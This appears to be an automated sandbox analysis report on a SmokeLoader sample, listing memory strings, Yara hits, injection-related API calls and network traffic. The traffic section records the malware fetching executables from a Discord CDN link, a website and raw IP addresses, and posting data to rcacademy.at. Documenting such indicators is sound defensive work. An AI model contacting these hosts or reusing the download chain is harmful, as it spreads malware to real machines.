                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                      Source: 8CE5.exe.5.drString found in binary or memory: https://www.digicert.com/CPS0
                      Source: DB56.exe, 00000012.00000002.632485022.0000000003F8E000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627799023.0000000002FE8000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629340657.0000000003095000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.633050720.000000000410A000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627956315.0000000002FFE000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629465096.00000000030BB000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630822590.0000000003268000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627635657.0000000002FBF000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631061376.000000000328F000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.632313973.0000000003EDD000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632026724.0000000002DC4000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631833709.0000000002D85000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632829047.0000000002FEB000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631906043.0000000002DAE000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632753160.0000000002FC5000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632145595.0000000002E18000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.633124266.0000000003ABA000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632075065.0000000002DF1000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: unknownDNS traffic detected: queries for: rcacademy.at
                      Source: global trafficHTTP traffic detected: GET /attachments/921473641538027521/921473810035793960/Vorticism.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
                      Source: global trafficHTTP traffic detected: GET /veldolore/scc.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bastinscustomfab.com
                      Source: global trafficHTTP traffic detected: GET /veldolore/scc.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: www.bastinscustomfab.comCookie: PHPSESSID=905f1348cca402f214daeb63de69114c
                      Source: global trafficHTTP traffic detected: GET /Igno.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.9.20.240:7769
                      Source: global trafficHTTP traffic detected: GET /install3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.112.83.8
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 18 Dec 2021 14:32:14 GMTServer: ApacheX-Powered-By: PHP/7.3.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.bastinscustomfab.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmpString found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpString found in binary or memory: m9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
                      Source: unknownHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sbhfij.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 167Host: rcacademy.at
                      Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.6:49796 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 50.62.140.96:443 -> 192.168.2.6:49830 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 50.62.140.96:443 -> 192.168.2.6:49831 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected SmokeLoaderShow sources
                      Source: Yara matchFile source: 0.2.fw8ex1BNek.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fw8ex1BNek.exe.630e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.acgvitw.630e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.3.acgvitw.640000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.fw8ex1BNek.exe.640000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.acgvitw.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.481080184.0000000000661000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.405588327.0000000002E51000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.427646956.00000000007C1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000003.468340916.0000000000640000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.481062049.0000000000640000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.427536379.0000000000680000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.360531074.0000000000640000.00000004.00000001.sdmp, type: MEMORY
                      Source: fw8ex1BNek.exe, 00000000.00000002.427675780.000000000080A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 17_2_02BF976017_2_02BF9760
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 17_2_02BF0BDF17_2_02BF0BDF
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 17_2_02BF0BC417_2_02BF0BC4
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 17_2_02BF0B7A17_2_02BF0B7A
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 17_2_02BF0B4817_2_02BF0B48
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 17_2_02BF0C2317_2_02BF0C23
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 17_2_02BF047017_2_02BF0470
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 17_2_02BF046217_2_02BF0462
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 17_2_052FDE3817_2_052FDE38
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 17_2_052F8DE817_2_052F8DE8
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 17_2_052F8DF817_2_052F8DF8
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 17_2_052FCC6817_2_052FCC68
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 17_2_052F865A17_2_052F865A
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 17_2_052FA05017_2_052FA050
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 17_2_0533181017_2_05331810
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 17_2_053353F817_2_053353F8
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 17_2_0533044817_2_05330448
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 17_2_05332E4817_2_05332E48
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 17_2_0533E0E217_2_0533E0E2
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 17_2_05337BAE17_2_05337BAE
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 18_2_014DEC6818_2_014DEC68
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 18_2_014DCBD718_2_014DCBD7
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 18_2_058E423018_2_058E4230
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 18_2_058E3EE818_2_058E3EE8
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 18_2_058E4B0018_2_058E4B00
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 18_2_058E001318_2_058E0013
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 18_2_058E004018_2_058E0040
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeCode function: 23_2_023E223023_2_023E2230
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeCode function: 23_2_023E224B23_2_023E224B
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeCode function: 23_2_023E21B823_2_023E21B8
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeCode function: 23_2_023E21EA23_2_023E21EA
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeCode function: 23_2_023E1EE023_2_023E1EE0
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeCode function: 23_2_023E1ED023_2_023E1ED0
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeCode function: 23_2_028993E023_2_028993E0
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeCode function: 23_2_028986A823_2_028986A8
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeCode function: 23_2_0289D43023_2_0289D430
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeCode function: 23_2_0289B44823_2_0289B448
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeCode function: 23_2_0289CED723_2_0289CED7
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeCode function: 23_2_0289D76323_2_0289D763
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeCode function: 23_2_029525F023_2_029525F0
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeCode function: 23_2_02956AA023_2_02956AA0
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeCode function: 23_2_0295EBB023_2_0295EBB0
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeCode function: 23_2_0295F7F023_2_0295F7F0
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeCode function: 23_2_029909E823_2_029909E8
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeCode function: 23_2_0299223023_2_02992230
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeCode function: 23_2_0299222023_2_02992220
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeCode function: 23_2_0299777123_2_02997771
                      Source: C:\Users\user\AppData\Local\Temp\8CE5.exeCode function: 24_2_73781BFF24_2_73781BFF
                      Source: C:\Users\user\AppData\Local\Temp\8CE5.exeCode function: 24_2_0286A91424_2_0286A914
                      Source: C:\Users\user\AppData\Local\Temp\8CE5.exeCode function: 24_2_02869E6C24_2_02869E6C
                      Source: C:\Users\user\AppData\Local\Temp\8CE5.exeCode function: 24_2_02865E6D24_2_02865E6D
                      Source: C:\Users\user\AppData\Local\Temp\8CE5.exeCode function: 24_2_0286667724_2_02866677
                      Source: C:\Users\user\AppData\Local\Temp\8CE5.exeCode function: 24_2_02865E7B24_2_02865E7B
                      Source: C:\Users\user\AppData\Local\Temp\8CE5.exeCode function: 24_2_02869B9224_2_02869B92
                      Source: C:\Users\user\AppData\Local\Temp\8CE5.exeCode function: 24_2_02866FCF24_2_02866FCF
                      Source: C:\Users\user\AppData\Local\Temp\8CE5.exeCode function: 24_2_02865B7224_2_02865B72
                      Source: C:\Users\user\AppData\Local\Temp\8CE5.exeCode function: 24_2_028690B124_2_028690B1
                      Source: C:\Users\user\AppData\Local\Temp\8CE5.exeCode function: 24_2_028618C424_2_028618C4
                      Source: C:\Users\user\AppData\Local\Temp\8CE5.exeCode function: 24_2_02867CC024_2_02867CC0
                      Source: C:\Users\user\AppData\Local\Temp\8CE5.exeCode function: 24_2_0286784E24_2_0286784E
                      Source: C:\Users\user\AppData\Local\Temp\8CE5.exeCode function: 24_2_0286A06A24_2_0286A06A
                      Source: C:\Users\user\AppData\Local\Temp\8CE5.exeCode function: 24_2_028699DC24_2_028699DC
                      Source: C:\Users\user\AppData\Local\Temp\8CE5.exeCode function: 24_2_028665DC24_2_028665DC
                      Source: C:\Users\user\AppData\Local\Temp\8CE5.exeCode function: 24_2_028699D824_2_028699D8
                      Source: C:\Users\user\AppData\Local\Temp\8CE5.exeCode function: 24_2_0286610124_2_02866101
                      Source: C:\Users\user\AppData\Local\Temp\8CE5.exeCode function: 24_2_02865D1C24_2_02865D1C
                      Source: fw8ex1BNek.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: fw8ex1BNek.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: fw8ex1BNek.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: fw8ex1BNek.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 4924.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 4924.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 4924.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 4924.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: acgvitw.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: acgvitw.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: acgvitw.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: acgvitw.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeSection loaded: mscorjit.dllJump to behavior
                      Source: fw8ex1BNek.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exeCode function: 0_2_00401889 Sleep,NtTerminateProcess,0_2_00401889
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exeCode function: 0_2_0040144E NtAllocateVirtualMemory,0_2_0040144E
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exeCode function: 0_2_00401471 NtAllocateVirtualMemory,0_2_00401471
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exeCode function: 0_2_00401824 Sleep,NtTerminateProcess,0_2_00401824
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exeCode function: 0_2_004024F3 NtClose,0_2_004024F3
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exeCode function: 0_2_00401888 Sleep,NtTerminateProcess,0_2_00401888
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exeCode function: 0_2_004018A2 Sleep,NtTerminateProcess,0_2_004018A2
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exeCode function: 0_2_004018A6 Sleep,NtTerminateProcess,0_2_004018A6
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exeCode function: 0_2_0040151C NtMapViewOfSection,0_2_0040151C
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exeCode function: 0_2_00402127 NtQuerySystemInformation,0_2_00402127
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exeCode function: 0_2_004021F4 NtQueryInformationProcess,0_2_004021F4
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exeCode function: 0_2_004021AC NtQueryInformationProcess,0_2_004021AC
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exeCode function: 0_2_00401FB5 NtQuerySystemInformation,0_2_00401FB5
                      Source: C:\Users\user\AppData\Roaming\acgvitwCode function: 11_2_00401889 Sleep,NtTerminateProcess,11_2_00401889
                      Source: C:\Users\user\AppData\Roaming\acgvitwCode function: 11_2_0040144E NtAllocateVirtualMemory,11_2_0040144E
                      Source: C:\Users\user\AppData\Roaming\acgvitwCode function: 11_2_00401471 NtAllocateVirtualMemory,11_2_00401471
                      Source: C:\Users\user\AppData\Roaming\acgvitwCode function: 11_2_00401824 Sleep,NtTerminateProcess,11_2_00401824
                      Source: C:\Users\user\AppData\Roaming\acgvitwCode function: 11_2_004024F3 NtClose,11_2_004024F3
                      Source: C:\Users\user\AppData\Roaming\acgvitwCode function: 11_2_00401888 Sleep,NtTerminateProcess,11_2_00401888
                      Source: C:\Users\user\AppData\Roaming\acgvitwCode function: 11_2_004018A2 Sleep,NtTerminateProcess,11_2_004018A2
                      Source: C:\Users\user\AppData\Roaming\acgvitwCode function: 11_2_004018A6 Sleep,NtTerminateProcess,11_2_004018A6
                      Source: C:\Users\user\AppData\Roaming\acgvitwCode function: 11_2_0040151C NtMapViewOfSection,11_2_0040151C
                      Source: C:\Users\user\AppData\Roaming\acgvitwCode function: 11_2_00402127 NtQuerySystemInformation,11_2_00402127
                      Source: C:\Users\user\AppData\Roaming\acgvitwCode function: 11_2_004021F4 NtQueryInformationProcess,11_2_004021F4
                      Source: C:\Users\user\AppData\Roaming\acgvitwCode function: 11_2_004021AC NtQueryInformationProcess,11_2_004021AC
                      Source: C:\Users\user\AppData\Roaming\acgvitwCode function: 11_2_00401FB5 NtQuerySystemInformation,11_2_00401FB5
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeCode function: 17_2_0541F9A0 NtAllocateVirtualMemory,17_2_0541F9A0
